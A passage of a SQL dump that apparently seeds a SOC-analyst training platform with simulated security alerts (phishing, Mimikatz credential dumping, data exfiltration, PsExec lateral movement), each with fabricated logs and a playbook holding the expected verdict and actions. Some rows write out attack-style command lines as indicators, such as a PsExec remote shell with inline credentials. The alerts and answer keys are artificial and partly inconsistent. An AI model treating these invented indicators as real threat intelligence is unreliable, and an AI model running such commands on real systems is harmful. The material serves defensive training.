host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"internal\",\"details\":\"IP of targeted SIS controller.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Triconex-targeting malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"triconex_exploit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"Malware file used in the attack.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"admin_sis\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"internal\",\"details\":\"Username used in the lateral movement attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(829, 'Exfiltration of System Configurations', 'high', 'Data Loss Prevention Systems', 'As the final step in their operation, attackers have successfully exfiltrated sensitive system configurations. This data is likely being analyzed to refine future attacks, posing a significant threat to the integrity of our systems.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"dlp-202310151435\",\"source_ip\":\"192.168.20.45\",\"destination_ip\":\"203.0.113.5\",\"user\":\"jdoe\",\"filename\":\"system_configs.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"status\":\"successful\",\"details\":\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\"}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.20.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"public_reputation\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"system_configs.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive configurations.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation\",\"verdict\":\"malicious\",\"details\":\"Hash of exfiltrated file linked to malicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_accounts\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(830, 'Initial Access via Phishing', 'high', 'Email gateway logs', 'The attackers initiated their campaign by sending targeted phishing emails to HSE employees, embedding malicious attachments designed to exploit vulnerabilities and install ransomware.', 'Spear-phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T10:45:30Z\",\"email_id\":\"abc123xyz\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"sender_email\":\"attacker@malicious.com\",\"recipient_email\":\"employee@hse.gov\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_2023.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\"}', '2026-01-13 01:56:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP address associated with multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Reported as phishing email sender.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing\",\"date\":\"2026-02-01T20:32:22.489Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(831, 'Lateral Movement Detected', 'high', 'Network traffic analysis', 'Network traffic analysis detected suspicious lateral movement activity. The attackers used credential dumping techniques to gain access to additional systems within the HSE network, targeting critical systems managing the COVID-19 vaccination program.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"event_type\":\"credential_access\",\"tool_used\":\"Mimikatz\",\"dump_file\":\"lsass.dmp\",\"username\":\"admin_user\",\"hash\":\"3b8e7f212f4f9b5a1c6c7a95b7e6d3e6\",\"alert_id\":\"alert_12345\",\"description\":\"Credential dumping attempt detected from external IP targeting HSE internal network.\"}', '2026-01-13 01:56:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical server within HSE network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b8e7f212f4f9b5a1c6c7a95b7e6d3e6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz credential dumping tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Logs\",\"verdict\":\"suspicious\",\"details\":\"File often used in credential dumping attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account with administrative privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(832, 'Data Exfiltration and Encryption - Step 3', 'critical', 'Data flow monitoring', 'During the ongoing attack operation, an unauthorized data transfer was detected from the internal network to an external IP. 700GB of sensitive data was exfiltrated before ransomware encryption commenced. The attack was aimed at disrupting HSE\'s operations.', 'Data Exfiltration', 'T1020', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"bytes_sent\":750000000,\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"confidential_data_export.zip\",\"username\":\"jdoe\",\"action\":\"data_transfer\",\"status\":\"Success\"}', '2026-01-13 01:56:44', '2026-02-16 17:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to a large archive potentially containing sensitive data.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data_export.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"File name matches patterns of unauthorized data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Active employee with access to sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":750000000,\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"confidential_data_export.zip\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(833, 'Critical Malware Execution Detected on Linux Server', 'critical', 'Syslog', 'A potentially malicious binary was executed on a Linux server. The file hash is associated with known malware.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T03:45:18Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"webadmin\",\"hostname\":\"server01\",\"command_line\":\"/usr/bin/python3 /tmp/malicious_script.py\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-14 15:19:37', '2026-02-16 17:57:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/bin/python3 /tmp/malicious_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known Python-based malware script\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with multiple malware families\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash and command line execution are indicative of a malware infection. Immediate action is required.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.492Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T03:45:18Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"webadmin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /tmp/malicious_script.py\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(834, 'Potential Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'An email was received containing a URL linked to a known phishing campaign.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-14T07:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.2.20\",\"username\":\"jdoe\",\"hostname\":\"user-pc\",\"email_sender\":\"info@fakebank.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-14 15:19:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Email domain spoofing legitimate banking services\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL involved in phishing attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are part of a well-known phishing campaign targeting financial services.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Potential Phishing Email Detected with Malicious URL\",\"date\":\"2026-02-01T20:32:22.494Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(835, 'Suspicious Internal Lateral Movement Detected via PSExec', 'medium', 'Wazuh', 'PSExec tool used for potential unauthorized lateral movement within the network.', 'Lateral Movement', 'T1077', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T09:10:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"workstation02\",\"command_line\":\"psexec \\\\\\\\192.168.1.20 -u admin -p password cmd\"}', '2026-01-14 15:19:37', '2026-03-11 01:23:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.20 -u admin -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage is often associated with lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with admin credentials suggests unauthorized lateral movement.\"}', 'Intermediate', 'EDR', 5, 1, 